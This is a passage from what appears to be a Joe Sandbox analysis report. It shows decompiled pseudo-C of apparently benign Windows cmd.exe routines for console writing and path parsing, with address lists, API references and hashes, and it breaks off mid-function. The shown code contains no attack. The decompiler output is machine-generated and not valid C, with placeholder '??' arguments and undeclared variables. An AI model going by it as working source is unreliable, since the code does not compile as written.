                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswdigit
                                    • String ID: +-~!$<>+-*/%()|^&=,
                                    • API String ID: 2770779731-632268628
                                    • Opcode ID: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                    • Instruction ID: 0d3cac2b9771f7124005ed13b5228e74fb370cb20230452fd0d6071d9c53e047
                                    • Opcode Fuzzy Hash: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                    • Instruction Fuzzy Hash: E61194B6604302EF9B2C9B1EE85997677E8EFAA675320042EF581C7581FF21D800C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E011DB610(void* __ebx, void** __ecx, void* __edi) {
                                    				void _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _t37;
                                    				intOrPtr _t39;
                                    				void* _t40;
                                    				void* _t52;
                                    				long _t55;
                                    				long _t56;
                                    				void* _t57;
                                    				long _t61;
                                    				void* _t66;
                                    				long _t73;
                                    				void* _t85;
                                    				void* _t87;
                                    				void** _t101;
                                    				long _t104;
                                    
                                    				_t101 = __ecx;
                                    				_t37 = E011E269C(E011DB6B9(__ecx));
                                    				_t104 = _t101[4];
                                    				if(_t37 != 0) {
                                    					_t39 = _t104 + _t101[2] * 2;
                                    					_v12 = _t39;
                                    					__eflags = _t104 - _t39;
                                    					if(_t104 < _t39) {
                                    						_t85 = 0x2022;
                                    						while(1) {
                                    							_t73 = _t104;
                                    							__eflags = _t104 - _t39;
                                    							if(_t104 >= _t39) {
                                    								goto L3;
                                    							} else {
                                    								goto L12;
                                    							}
                                    							while(1) {
                                    								L12:
                                    								__eflags =  *_t73 - _t85;
                                    								if( *_t73 == _t85) {
                                    									break;
                                    								}
                                    								_t73 = 2 + _t73;
                                    								__eflags = _t73 - _t39;
                                    								if(_t73 < _t39) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							__eflags = _t73 - _t104;
                                    							if(_t73 == _t104) {
                                    								goto L20;
                                    							} else {
                                    								_t66 = _t73 - _t104 >> 1;
                                    								_v16 = _t66;
                                    								__imp___get_osfhandle(0);
                                    								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
                                    								__eflags = _t54;
                                    								if(_t54 == 0) {
                                    									goto L30;
                                    								} else {
                                    									_t54 = _v16;
                                    									__eflags = _v8 - _v16;
                                    									if(_v8 != _v16) {
                                    										goto L30;
                                    									} else {
                                    										_t39 = _v12;
                                    										_t104 = _t73;
                                    										_t85 = 0x2022;
                                    										while(1) {
                                    											L20:
                                    											__eflags = _t73 - _t39;
                                    											if(_t73 >= _t39) {
                                    												break;
                                    											}
                                    											__eflags =  *_t73 - _t85;
                                    											if( *_t73 == _t85) {
                                    												_t73 = 2 + _t73;
                                    												__eflags = _t73;
                                    												continue;
                                    											}
                                    											break;
                                    										}
                                    										__eflags = _t73 - _t104;
                                    										if(_t73 == _t104) {
                                    											L27:
                                    											_t85 = 0x2022;
                                    											__eflags = _t104 - _t39;
                                    											if(_t104 < _t39) {
                                    												continue;
                                    											} else {
                                    												goto L3;
                                    											}
                                    										} else {
                                    											__eflags =  *_t101;
                                    											if( *_t101 != 0) {
                                    												SetConsoleMode( *_t101, 2);
                                    											}
                                    											_t52 = _t73 - _t104 >> 1;
                                    											_v16 = _t52;
                                    											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
                                    											_t87 = 1;
                                    											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
                                    											_t54 = E011E06C0(_t87);
                                    											__eflags = _t104;
                                    											if(_t104 == 0) {
                                    												goto L30;
                                    											} else {
                                    												_t54 = _v16;
                                    												__eflags = _v8 - _v16;
                                    												if(_v8 != _v16) {
                                    													goto L30;
                                    												} else {
                                    													_t39 = _v12;
                                    													_t104 = _t73;
                                    													goto L27;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							goto L38;
                                    						}
                                    					}
                                    					goto L3;
                                    				} else {
                                    					if(E011E27C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
                                    						L30:
                                    						_t89 = 1;
                                    						_t55 = E011E0178(_t54);
                                    						__eflags = _t55;
                                    						if(_t55 == 0) {
                                    							_t89 = 1;
                                    							_t56 = E011F9953(_t55, 1);
                                    							__eflags = _t56;
                                    							if(_t56 == 0) {
                                    								_push(_t56);
                                    								_push(0x70);
                                    								goto L34;
                                    							}
                                    						} else {
                                    							_push(0);
                                    							_push(0x1d);
                                    							L34:
                                    							E011DC5A2(_t89);
                                    							_pop(_t89);
                                    						}
                                    						_t57 = E011F9287(_t89);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						asm("int3");
                                    						__eflags =  *(_t104 + 4) - _t57;
                                    						if(__eflags < 0) {
                                    							return _t57;
                                    						} else {
                                    							E011F3BB0(__eflags, 0);
                                    							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
                                    							E011E4F29(_t104);
                                    							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
                                    							__eflags = _t61;
                                    							 *(_t104 + 0x24) = _t61;
                                    							return _t61;
                                    						}
                                    					} else {
                                    						_t70 = _t101[2];
                                    						_t54 = _t101[2] + _t70;
                                    						if(_v8 != _t101[2] + _t70) {
                                    							goto L30;
                                    						} else {
                                    							L3:
                                    							_t40 = E011E269C(_t39);
                                    							if(_t40 != 0) {
                                    								__imp___get_osfhandle(0);
                                    								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
                                    							} else {
                                    								E011E27C8( &_v8, L"\r\n", 4,  &_v8);
                                    							}
                                    							_t101[1] = _t101[1] + E011DBED7(_t101, _t101[4]) + 1;
                                    							E011DB6B9(_t101);
                                    							if(_t101[1] > _t101[7]) {
                                    								_t101[1] = _t101[1] & 0x00000000;
                                    							}
                                    							 *(_t101[4]) = 0;
                                    							_t101[2] = _t101[2] & 0;
                                    							return 0;
                                    						}
                                    					}
                                    				}
                                    				L38:
                                    			}




















                                    0x011e9940
                                    0x011e9940
                                    0x011e9942
                                    0x011e9955
                                    0x011e9955
                                    0x011e995b
                                    0x011e995b
                                    0x011e995c
                                    0x011e9968
                                    0x011e996e
                                    0x011e996f
                                    0x011e9972
                                    0x011db6ca
                                    0x011e9978
                                    0x011e997a
                                    0x011e997f
                                    0x011e9985
                                    0x011e998d
                                    0x011e998d
                                    0x011e998e
                                    0x011e9992
                                    0x011e9992
                                    0x011db651
                                    0x011db651
                                    0x011db654
                                    0x011db659
                                    0x00000000
                                    0x011db65f
                                    0x011db65f
                                    0x011db662
                                    0x011db66c
                                    0x011e9921
                                    0x011e9929
                                    0x011db672
                                    0x011db67d
                                    0x011db67d
                                    0x011db68f
                                    0x011db692
                                    0x011db69d
                                    0x011db6b3
                                    0x011db6b3
                                    0x011db6a4
                                    0x011db6a7
                                    0x011db6b2
                                    0x011db6b2
                                    0x011db659
                                    0x011db64b
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011E987D
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9885
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,011E65F0,?,011E64F0), ref: 011E98C4
                                    • _get_osfhandle.MSVCRT ref: 011E98DD
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E98E5
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9968
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                    • String ID:
                                    • API String ID: 1333215474-0
                                    • Opcode ID: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                    • Instruction ID: 4b6af5c88d5ffea4c74fa34773138b1681615abdef8cfce3835f756827ae972a
                                    • Opcode Fuzzy Hash: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                    • Instruction Fuzzy Hash: FC51C531B0070AEBDB2CEBB8D85DB6EB7E8EB14709F05452AE502D7281EB70D940CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E011DC923(signed short** __ecx) {
                                    				signed short* _v8;
                                    				intOrPtr _v12;
                                    				int _v16;
                                    				signed int _v20;
                                    				intOrPtr _v24;
                                    				signed short _t33;
                                    				signed int _t34;
                                    				intOrPtr _t35;
                                    				WCHAR* _t36;
                                    				signed int _t38;
                                    				void* _t39;
                                    				signed int _t40;
                                    				signed int _t41;
                                    				WCHAR* _t42;
                                    				WCHAR* _t47;
                                    				signed int _t48;
                                    				signed int _t49;
                                    				void* _t54;
                                    				long _t56;
                                    				int _t62;
                                    				signed short _t64;
                                    				signed int _t69;
                                    				signed int _t70;
                                    				signed short* _t72;
                                    				signed short* _t74;
                                    				intOrPtr _t75;
                                    				WCHAR* _t77;
                                    				signed int _t79;
                                    				signed char _t80;
                                    				signed short* _t82;
                                    				WCHAR* _t84;
                                    				WCHAR* _t90;
                                    				signed int _t95;
                                    				signed short* _t107;
                                    				signed int _t108;
                                    				short* _t109;
                                    				short* _t111;
                                    				WCHAR* _t114;
                                    				void* _t115;
                                    				void* _t116;
                                    				void* _t117;
                                    				WCHAR** _t121;
                                    				signed short* _t122;
                                    				signed int _t124;
                                    				WCHAR* _t125;
                                    				WCHAR* _t126;
                                    				WCHAR* _t129;
                                    				int _t130;
                                    				signed int _t131;
                                    				WCHAR* _t132;
                                    
                                    				_t121 = __ecx;
                                    				_v12 = 0x11d1f8c;
                                    				 *0x1213cf0 = 0;
                                    				_t82 =  *__ecx;
                                    				_t122 = _t82;
                                    				_t2 =  &(_t122[1]); // 0x2
                                    				_t107 = _t2;
                                    				do {
                                    					_t33 =  *_t122;
                                    					_t122 =  &(_t122[1]);
                                    				} while (_t33 != 0);
                                    				_t34 =  *_t82 & 0x0000ffff;
                                    				_t124 = _t122 - _t107 >> 1;
                                    				_t74 = _t82;
                                    				_v20 = _t124;
                                    				_t108 = _t34;
                                    				if(_t34 == 0) {
                                    					L6:
                                    					_t35 = 0x3a;
                                    					_v8 = _t74;
                                    					_v24 = _t35;
                                    					if(_t108 == _t35) {
                                    						__eflags = _t124 - 2;
                                    						if(_t124 <= 2) {
                                    							goto L7;
                                    						}
                                    						 *_t74 = 0;
                                    						_t24 = _t74 - 2; // -2
                                    						_v8 = _t24;
                                    						_t62 = SetErrorMode(0);
                                    						_t102 =  *_t121;
                                    						_v16 = _t62;
                                    						_t132 = E011DD120( *_t121, 0x8000, _t82);
                                    						__eflags = _t132 - 0xffffffff;
                                    						if(_t132 == 0xffffffff) {
                                    							L49:
                                    							__eflags =  *0x11fd0dc - 4;
                                    							_t64 = 0x3a;
                                    							_v8 = _t74;
                                    							 *_t74 = _t64;
                                    							if( *0x11fd0dc != 4) {
                                    								E011DC5A2(_t102, 0x236b, 1,  *_t121);
                                    							} else {
                                    								__eflags =  *0x11fd5a8;
                                    								if( *0x11fd5a8 == 0) {
                                    									E011DC5A2(_t102, 0x236b, 1,  *_t121);
                                    								}
                                    								 *0x11fd5a4 = 1;
                                    							}
                                    							__eflags = _t132 - 0xffffffff;
                                    							L55:
                                    							if(__eflags == 0) {
                                    								L57:
                                    								SetErrorMode(_v16);
                                    								goto L7;
                                    							}
                                    							L56:
                                    							E011DDB92(_t132);
                                    							goto L57;
                                    						}
                                    						_t69 = E011E0178(_t63);
                                    						__eflags = _t69;
                                    						if(_t69 != 0) {
                                    							L47:
                                    							_t70 = E011E0178(_t69);
                                    							__eflags = _t70;
                                    							if(_t70 != 0) {
                                    								goto L56;
                                    							}
                                    							__eflags = E011F9953(_t70, _t132);
                                    							goto L55;
                                    						}
                                    						_t102 = _t132;
                                    						_t69 = E011F9953(_t69, _t132);
                                    						__eflags = _t69;
                                    						if(_t69 == 0) {
                                    							goto L49;
                                    						}
                                    						goto L47;
                                    					}
                                    					L7:
                                    					_t83 = 0x250;
                                    					_t36 = E011E00B0(0x250);
                                    					if(_t36 == 0) {
                                    						L58:
                                    						E011F9287(_t83);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						L59:
                                    						_t125 =  *_t121;
                                    						_t75 = 0;
                                    						__eflags = 0;
                                    						_t84 = _t125;
                                    						_t29 =  &(_t84[1]); // 0x0
                                    						_t109 = _t29;
                                    						do {
                                    							_t38 =  *_t84;
                                    							_t84 =  &(_t84[1]);
                                    							__eflags = _t38;
                                    						} while (_t38 != 0);
                                    						__eflags = _t84 - _t109 >> 1 - 2;
                                    						if(_t84 - _t109 >> 1 >= 2) {
                                    							_t38 = 0x3a;
                                    							__eflags = _t125[1] - _t38;
                                    							if(_t125[1] == _t38) {
                                    								_t125 =  &(_t125[2]);
                                    							}
                                    						}
                                    						L11:
                                    						__imp___wcsicmp(_t125, ".");
                                    						if(_t38 == 0) {
                                    							L39:
                                    							_t126 =  *_t121;
                                    							_t39 = 0x5c;
                                    							_t40 = E011E2349(_t126, _t39);
                                    							__eflags = _t40;
                                    							if(_t40 == 0) {
                                    								_t90 = _t126;
                                    								__eflags = 0;
                                    								_t31 =  &(_t90[1]); // 0x0
                                    								_t111 = _t31;
                                    								do {
                                    									_t41 =  *_t90;
                                    									_t90 =  &(_t90[1]);
                                    									__eflags = _t41;
                                    								} while (_t41 != 0);
                                    								__eflags = _t90 - _t111 >> 1 - 2;
                                    								if(_t90 - _t111 >> 1 != 2) {
                                    									goto L40;
                                    								}
                                    								_t54 = 0x3a;
                                    								__eflags = _t126[1] - _t54;
                                    								if(_t126[1] == _t54) {
                                    									L42:
                                    									 *(_t121[6]) = 0x10;
                                    									L17:
                                    									_t79 = 1;
                                    									_t129 = 0;
                                    									_t47 =  *_t121;
                                    									_t114 = _t47;
                                    									while(1) {
                                    										_t95 =  *_t114 & 0x0000ffff;
                                    										if(_t95 == 0) {
                                    											break;
                                    										}
                                    										if(_t95 == _v16) {
                                    											L23:
                                    											_t129 = _t114;
                                    											L21:
                                    											_t114 =  &(_t114[1]);
                                    											_t79 = _t79 + 1;
                                    											continue;
                                    										}
                                    										if(_t95 == _v24) {
                                    											__eflags = _t79 - 2;
                                    											if(_t79 != 2) {
                                    												goto L21;
                                    											}
                                    											goto L23;
                                    										}
                                    										goto L21;
                                    									}
                                    									_t121[3] = _t129;
                                    									__eflags = _t129;
                                    									if(_t129 == 0) {
                                    										_t129 = _t47;
                                    									} else {
                                    										__eflags =  *_t129;
                                    										if( *_t129 == 0) {
                                    											_t47 = _t129;
                                    										} else {
                                    											_t12 =  &(_t129[1]); // 0x2
                                    											_t47 = _t12;
                                    										}
                                    									}
                                    									_t115 = 0x2a;
                                    									_t121[4] = _t47;
                                    									_t48 = E011DD7D4(_t129, _t115);
                                    									__eflags = _t48;
                                    									if(_t48 == 0) {
                                    										_t116 = 0x3f;
                                    										_t49 = E011DD7D4(_t129, _t116);
                                    										__eflags = _t49;
                                    										if(_t49 == 0) {
                                    											goto L29;
                                    										}
                                    										goto L28;
                                    									} else {
                                    										L28:
                                    										_t14 =  &(_t121[7]);
                                    										 *_t14 = _t121[7] | 0x00000008;
                                    										__eflags =  *_t14;
                                    										 *0x1213cd0 = 1;
                                    										L29:
                                    										_t117 = 0x2e;
                                    										_t121[5] = E011DD7D4(_t129, _t117);
                                    										__eflags = 1;
                                    										return 1;
                                    									}
                                    								}
                                    							}
                                    							L40:
                                    							_t77 =  *_t121;
                                    							_t83 = _v20 + 5 + _v20 + 5;
                                    							_t42 = E011E00B0(_v20 + 5 + _v20 + 5);
                                    							__eflags = _t42;
                                    							if(_t42 == 0) {
                                    								goto L58;
                                    							}
                                    							 *_t121 = _t42;
                                    							E011E1040(_t42, _t128, _t77);
                                    							E011E18C0( *_t121, _t128, _v12);
                                    							goto L42;
                                    						}
                                    						__imp___wcsicmp(_t125, L"..");
                                    						if(_t38 == 0) {
                                    							goto L39;
                                    						}
                                    						if( *0x11fd0dc == 4) {
                                    							__eflags =  *0x11fd5ac - 1;
                                    							if( *0x11fd5ac == 1) {
                                    								goto L14;
                                    							}
                                    							__eflags =  *0x11fd0c0 - 1;
                                    							if( *0x11fd0c0 != 1) {
                                    								goto L17;
                                    							}
                                    							 *0x11fd0c0 = _t75;
                                    						}
                                    						L14:
                                    						_t80 = GetFileAttributesW( *_t121);
                                    						if(_t80 != 0xffffffff) {
                                    							_t56 = 0;
                                    						} else {
                                    							_t56 = GetLastError();
                                    						}
                                    						 *0x1213cf0 = _t56;
                                    						if(_t80 != 0xffffffff) {
                                    							__eflags = _t80 & 0x00000010;
                                    							if((_t80 & 0x00000010) == 0) {
                                    								goto L17;
                                    							}
                                    							goto L39;
                                    						} else {
                                    							goto L17;
                                    						}
                                    					}
                                    					_t121[6] = _t36;
                                    					_t130 = 0x5c;
                                    					_v16 = _t130;
                                    					if(( *_v8 & 0x0000ffff) == _t130) {
                                    						_v12 = 0x11d1f8e;
                                    						goto L39;
                                    					}
                                    					_t38 = E011E2349( *_t121, _t130);
                                    					_t131 = _t38;
                                    					if(_t131 == 0) {
                                    						goto L59;
                                    					}
                                    					_t125 = _t131 + 2;
                                    					_t75 = 0;
                                    					goto L11;
                                    				} else {
                                    					goto L4;
                                    					L4:
                                    					_t72 = _t82;
                                    					_t74 = _t82;
                                    					_t82 =  &(_t82[1]);
                                    					if( *_t82 != 0) {
                                    						goto L4;
                                    					} else {
                                    						_t108 =  *_t72 & 0x0000ffff;
                                    						goto L6;
                                    					}
                                    				}
                                    			}
                                    0x00000000
                                    0x011dca4b
                                    0x011dca46
                                    0x011dca4e
                                    0x011dca51
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dca51
                                    0x00000000
                                    0x011dca46
                                    0x011dca57
                                    0x011dca5a
                                    0x011dca5c
                                    0x011eb13a
                                    0x011dca62
                                    0x011dca64
                                    0x011dca67
                                    0x011eb133
                                    0x011dca6d
                                    0x011dca6d
                                    0x011dca6d
                                    0x011dca6d
                                    0x011dca67
                                    0x011dca72
                                    0x011dca75
                                    0x011dca78
                                    0x011dca7d
                                    0x011dca7f
                                    0x011dcaa8
                                    0x011dcaab
                                    0x011dcab0
                                    0x011dcab2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dca81
                                    0x011dca81
                                    0x011dca81
                                    0x011dca81
                                    0x011dca81
                                    0x011dca85
                                    0x011dca8f
                                    0x011dca91
                                    0x011dca99
                                    0x011dcaa0
                                    0x011dcaa5
                                    0x011dcaa5
                                    0x011dca7f
                                    0x011eb12e
                                    0x011dcb0a
                                    0x011dcb0d
                                    0x011dcb12
                                    0x011dcb15
                                    0x011dcb1a
                                    0x011dcb1c
                                    0x00000000
                                    0x00000000
                                    0x011dcb25
                                    0x011dcb29
                                    0x011dcb35
                                    0x00000000
                                    0x011dcb35
                                    0x011dc9e5
                                    0x011dc9ef
                                    0x00000000
                                    0x00000000
                                    0x011dc9fc
                                    0x011dcac8
                                    0x011dcacf
                                    0x00000000
                                    0x00000000
                                    0x011dcad5
                                    0x011dcadc
                                    0x00000000
                                    0x00000000
                                    0x011dcae2
                                    0x011dcae2
                                    0x011dca02
                                    0x011dca0a
                                    0x011dca0f
                                    0x011dcab6
                                    0x011dca15
                                    0x011dca15
                                    0x011dca15
                                    0x011dca1b
                                    0x011dca23
                                    0x011dcabd
                                    0x011dcac0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dca23
                                    0x011dc999
                                    0x011dc9a1
                                    0x011dc9a2
                                    0x011dc9ab
                                    0x011dcaed
                                    0x00000000
                                    0x011dcaed
                                    0x011dc9b5
                                    0x011dc9ba
                                    0x011dc9be
                                    0x00000000
                                    0x00000000
                                    0x011dc9c4
                                    0x011dc9c7
                                    0x00000000
                                    0x011dc964
                                    0x011dc964
                                    0x011dc966
                                    0x011dc966
                                    0x011dc968
                                    0x011dc96a
                                    0x011dc970
                                    0x00000000
                                    0x011dc972
                                    0x011dc972
                                    0x00000000
                                    0x011dc972
                                    0x011dc970

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DC9CF
                                    • _wcsicmp.MSVCRT ref: 011DC9E5
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                    • String ID:
                                    • API String ID: 2943530692-0
                                    • Opcode ID: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                    • Instruction ID: e635eb14b41ad880cde4bf3ec2172fe7cba291c3e8be8141d8583cab9848a835
                                    • Opcode Fuzzy Hash: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                    • Instruction Fuzzy Hash: E3912735B006129BDB3DEFBC985836ABBE1BB48314B15492DD916D72C4FB709981CBC2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E011E5E50(void* __ecx) {
                                    				intOrPtr _v8;
                                    				long _v16;
                                    				signed int _v20;
                                    				char _v28;
                                    				intOrPtr _v36;
                                    				signed int _v48;
                                    				short _v52;
                                    				WCHAR* _v54;
                                    				signed char _v56;
                                    				signed int _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				long _v72;
                                    				long _v80;
                                    				WCHAR* _v88;
                                    				signed char* _v92;
                                    				short _v104;
                                    				char _v108;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t60;
                                    				signed int _t61;
                                    				WCHAR* _t65;
                                    				short _t66;
                                    				void* _t67;
                                    				void* _t68;
                                    				void* _t74;
                                    				short _t77;
                                    				void* _t78;
                                    				short _t82;
                                    				wchar_t* _t85;
                                    				signed char _t86;
                                    				short _t89;
                                    				short _t90;
                                    				wchar_t* _t102;
                                    				long _t103;
                                    				short* _t104;
                                    				short _t105;
                                    				long _t106;
                                    				short* _t109;
                                    				signed int _t110;
                                    				WCHAR* _t114;
                                    				WCHAR* _t126;
                                    				short _t132;
                                    				long _t134;
                                    				WCHAR* _t138;
                                    				short* _t142;
                                    				void* _t147;
                                    				WCHAR* _t149;
                                    				void* _t150;
                                    				signed int _t155;
                                    				signed int _t157;
                                    				short _t163;
                                    
                                    				_t110 = _t155;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t157 = (_t155 & 0xfffffff8) + 4;
                                    				_v8 =  *((intOrPtr*)(_t110 + 4));
                                    				_t153 = _t157;
                                    				_push(0xfffffffe);
                                    				_push(0x11fbe38);
                                    				_push(E011E7290);
                                    				_push( *[fs:0x0]);
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_push(_t110);
                                    				_t60 =  *0x11fd0b4; // 0x2833377e
                                    				_v20 = _v20 ^ _t60;
                                    				_t61 = _t60 ^ _t157;
                                    				_v48 = _t61;
                                    				_push(_t61);
                                    				 *[fs:0x0] =  &_v28;
                                    				_v36 = _t157 - 0x48;
                                    				_t65 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)) + 0x3c)), 0, 0 |  *0x1213cc9 != 0x00000000);
                                    				_t149 = _t65;
                                    				_v64 = _t149;
                                    				_v68 = _t149;
                                    				if( *0x1213cc9 == 0) {
                                    					L6:
                                    					_t114 = _t149;
                                    					_t15 =  &(_t114[1]); // 0x2
                                    					_t142 = _t15;
                                    					do {
                                    						_t66 =  *_t114;
                                    						_t114 =  &(_t114[1]);
                                    					} while (_t66 != 0);
                                    					_v60 = _t114 - _t142 >> 1;
                                    					_t67 = E011E22C0(_t110, _t149);
                                    					_t144 = _v60 + 1;
                                    					_t118 = _t149;
                                    					_t68 = E011E1040(_t149, _v60 + 1, _t67);
                                    					 *0x120b8b0 = 0;
                                    					if( *_t149 == 0) {
                                    						E011F83FD(_t68, _t118);
                                    						L18:
                                    						 *[fs:0x0] = _v28;
                                    						_pop(_t147);
                                    						_pop(_t150);
                                    						return E011E6FD0( *0x120b8b0, _t110, _v48 ^ _t153, _t144, _t147, _t150);
                                    					}
                                    					if(E011E5D59(_t110) == 0) {
                                    						_push(0);
                                    						_push(0x40002728);
                                    						L47:
                                    						E011DC5A2(_t118);
                                    						 *0x120b8b0 = 1;
                                    						goto L18;
                                    					}
                                    					if( *0x1213cc9 == 0) {
                                    						L12:
                                    						_t171 =  *0x120b8b0;
                                    						if( *0x120b8b0 != 0) {
                                    							L45:
                                    							_t74 = E011E4B96(_t110, 0, _t149, __eflags);
                                    							RtlFreeHeap(GetProcessHeap(), 0, _t74);
                                    							_push(0);
                                    							_push( *0x120b8b0);
                                    							goto L47;
                                    						}
                                    						_t144 = 0;
                                    						_t118 = _t149;
                                    						_t77 = E011E33FC(_t110, _t149, 0, 0, _t149, _t171);
                                    						 *0x120b8b0 = _t77;
                                    						if(_t77 == 0) {
                                    							_t78 = 0x3a;
                                    							if(_t149[1] == _t78) {
                                    								if( *0x1213cb8 == 0) {
                                    									_t118 = 0x1213ab0;
                                    								}
                                    								_t144 =  *0x1213cc0;
                                    								E011E36CB(_t110, _t118,  *0x1213cc0,  *_t149 & 0x0000ffff);
                                    							}
                                    						}
                                    						if( *0x120b8b0 != 0) {
                                    							goto L45;
                                    						}
                                    						goto L18;
                                    					}
                                    					_t144 = 0x5c;
                                    					if( *_t149 == _t144) {
                                    						__eflags = _t149[1] - _t144;
                                    						if(__eflags != 0) {
                                    							goto L12;
                                    						}
                                    						_t126 = _t149;
                                    						_t24 =  &(_t126[1]); // 0x2
                                    						_v60 = _t24;
                                    						do {
                                    							_t82 =  *_t126;
                                    							_t126 =  &(_t126[1]);
                                    							__eflags = _t82;
                                    						} while (_t82 != 0);
                                    						_v72 = (_t126 - _v60 >> 1) + 1;
                                    						_t29 =  &(_t149[2]); // 0x4
                                    						_t85 = wcschr(_t29, _t144);
                                    						_v60 = _t85;
                                    						__eflags = _t85;
                                    						if(_t85 != 0) {
                                    							_t134 = 0x5c;
                                    							_t102 = wcschr( &(_t85[0]), _t134);
                                    							_v60 = _t102;
                                    							__eflags = _t102;
                                    							if(_t102 != 0) {
                                    								_t103 = GetFileAttributesW(_t149);
                                    								__eflags = _t103 - 0xffffffff;
                                    								if(_t103 != 0xffffffff) {
                                    									_t104 = _v60;
                                    									 *_t104 = 0;
                                    									_t105 = _t104 + 2;
                                    									__eflags = _t105;
                                    									_v60 = _t105;
                                    								} else {
                                    									_t106 = GetLastError();
                                    									 *0x120b8b0 = _t106;
                                    									__eflags = _t106 - 2;
                                    									if(_t106 == 2) {
                                    										 *0x120b8b0 = 3;
                                    									}
                                    								}
                                    							}
                                    						}
                                    						_t86 = 0x5a;
                                    						_v56 = _t86;
                                    						_t118 = 0x3a;
                                    						_v54 = _t118;
                                    						__eflags = 0;
                                    						_v52 = 0;
